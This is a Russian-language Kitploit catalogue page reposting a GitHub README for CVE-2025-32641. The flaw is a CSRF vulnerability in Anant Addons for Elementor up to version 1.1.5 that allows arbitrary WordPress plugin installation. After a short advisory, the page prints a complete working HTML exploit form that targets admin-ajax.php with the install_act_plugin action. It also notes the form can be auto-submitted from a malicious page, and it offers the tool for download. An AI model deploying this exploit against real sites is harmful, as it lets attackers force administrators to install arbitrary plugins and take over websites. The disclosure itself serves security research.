Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32641 — Anant Addons for Elementor <= 1.1.5 Уязвимость CSRF, приводящая к произвольной установке плагинов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-32641
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьСтатьи и ИсследованияОбучение и Образование
GitHubnxploited/cve-2025-32641

CVE-2025-32641

Anant Addons for Elementor <= 1.1.5 Уязвимость CSRF, приводящая к произвольной установке плагинов

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ Anant Addons for Elementor <= 1.1.5 - CSRF, приводящая к произвольной установке плагинов

🧨 CVE-2025-32641

Уязвимость межсайтовой подделки запроса (CSRF) в Anant Addons for Elementor от anantaddons
Эта проблема затрагивает версии: от неизвестной версии до 1.1.5

  • Базовый балл: 9.6 (КРИТИЧЕСКИЙ)
  • Вектор CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔍 Описание

Эта уязвимость позволяет неаутентифицированным атакующим выполнять произвольную установку плагинов от имени авторизованного администратора без его ведома.
Создав вредоносную страницу или форму, атакующий может незаметно заставить администратора установить и активировать любой плагин из репозитория WordPress.


💥 Воздействие

  • ✅ Произвольная установка плагинов
  • ✅ Активация плагинов
  • ❌ Отсутствует nonce или CSRF-защита
  • ✅ Эксплуатируется через простую HTML-страницу
  • ⚠️ Требуется, чтобы администратор был авторизован и открыл вредоносную страницу

🧪 HTML PoC

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Anant Addons for Elementor <= 1.1.5 CSRF Exploit</title>
  <style>
    body {
      background-color: #111;
      color: #0f0;
      font-family: monospace;
      padding: 40px;
    }
    h1 {
      color: #ff0055;
      font-size: 24px;
      border-bottom: 1px solid #555;
      padding-bottom: 10px;
    }
    .box {
      background-color: #222;
      border: 1px solid #444;
      padding: 20px;
      margin-top: 20px;
    }
    input[type="submit"] {
      background-color: #ff0055;
      color: #fff;
      border: none;
      padding: 10px 20px;
      font-weight: bold;
      cursor: pointer;
    }
    input[type="submit"]:hover {
      background-color: #cc0044;
    }
  </style>
</head>
<body>

  <h1>
    Anant Addons for Elementor <= 1.1.5<br>
    CSRF to Arbitrary Plugin Installation Vulnerability
  </h1>

  <div class="box">
    <p># By: <strong>Nxploited | Khaled Alenazi</strong></p>
    <p># Type: <strong>CSRF (No Nonce Validation)</strong></p>
    <p># Impact: <strong>Unauthenticated attacker can force admin to install and activate arbitrary WordPress plugins</strong></p>
  </div>

  <form action="http://192.168.100.74:888/wordpress/wp-admin/admin-ajax.php?action=install_act_plugin" method="POST" class="box">
    <input type="hidden" name="plugs" value="hello-dolly">
    <p>🎯 Click the button below to trigger plugin installation (admin session must be active):</p>
    <input type="submit" value="Exploit Now">
  </form>

</body>
</html>


🎯 Когда авторизованный администратор отправляет эту форму (или она автоматически отправляется на вредоносной странице), плагин будет незаметно установлен и активирован.


⚠️ Отказ от ответственности

Этот репозиторий и контент предназначены только для образовательных целей и исследований в области безопасности.
Автор не несет ответственности за любое неправильное использование или ущерб, причиненный ненадлежащим использованием этой информации.
Всегда проводите тестирование только на системах, которые принадлежат вам или на тестирование которых у вас есть явное разрешение.


автор: Nxploited | Khaled ALenazi

Скачать инструмент